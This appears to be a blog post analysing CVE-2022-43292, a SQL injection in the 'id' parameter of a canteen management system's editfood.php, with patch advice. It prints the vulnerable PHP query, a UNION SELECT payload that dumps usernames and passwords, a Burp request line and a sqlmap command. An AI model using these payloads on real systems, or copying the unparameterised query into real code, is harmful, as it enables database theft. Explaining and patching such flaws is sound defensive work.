CVE-2022-43292 - SQL Injection in Canteen Management System v1. (editfood.php ‘id’ Parameter) – Exploit Analysis and Patch Guide

The world of web applications is full of vulnerabilities, and SQL injection remains one of the most critical. In this post, we'll discuss a real-world example: CVE-2022-43292, a SQL injection flaw found in the Canteen Management System v1.. This vulnerability was discovered in the editfood.php file, specifically using the id parameter. Here, we’ll break down how it was found, what risks it carries, show sample code, provide original references, and explain how you can exploit and patch it. Let’s dive in!

What is CVE-2022-43292?

CVE-2022-43292 is an identifier for a specific vulnerability in the popular “Canteen Management System” project (v1.). This flaw occurs due to the improper handling of user input, leading to SQL injection issues.

- AFFECTED FILE: /youthappam/editfood.php

Breaking Down the SQL Injection

SQL Injection vulnerabilities allow attackers to interfere with the queries an application makes to its database. In this case, the “id” parameter is taken directly from the URL and passed into an SQL query without proper validation or escaping.

Typical vulnerable PHP code in editfood.php

<?php
include 'db_connect.php'; // Connects to the database
$id = $_GET['id']; // Gets 'id' from the URL
$sql = "SELECT * FROM food_items WHERE id = $id"; // Builds the SQL query
$result = mysqli_query($conn, $sql); // Executes the query
// ... rest of code to display the food details
?>

What is wrong here?
There’s no sanitization or escaping of the variable $id. The user can directly inject malicious SQL code.

How to Exploit CVE-2022-43292

Any attacker (even with just a browser) can exploit this issue. Let’s see how.

Suppose the genuine URL is

http://example.com/youthappam/editfood.php?id=1

To get ALL data from the users table, an attacker can try

http://example.com/youthappam/editfood.php?id=1 UNION SELECT 1, username, password FROM users--

In Burp Suite, it might look like

GET /youthappam/editfood.php?id=1 UNION SELECT 1,username,password FROM users-- HTTP/1.1

With sqlmap, the automated tool

sqlmap -u "http://example.com/youthappam/editfood.php?id=1" --dbs

This command lets sqlmap enumerate all databases by exploiting the injection point.

Update the PHP code to safely process user input.

<?php
include 'db_connect.php';
$stmt = $conn->prepare("SELECT * FROM food_items WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
// ... rest of code to display food details
?>

2. Typecast and Validate ALL Input

$id = intval($_GET['id']);

3. Escaping is NOT Enough:
While escaping can help, parameterized statements are the only real solution.

Official References

- NVD - CVE-2022-43292 Details
- Exploit Database Entry (EDB-ID: 51059)
- Original Source Code

Conclusion

CVE-2022-43292 is a classic example of why secure coding standards are important—especially in handling user input. Even a simple PHP page can open the door to complete database takeover if input isn’t sanitized. If you’re using Canteen Management System v1., patch immediately… or risk serving up more than just meals!


> Always test vulnerabilities on legal and authorized systems only!

Timeline

Published on: 11/09/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:01:00 UTC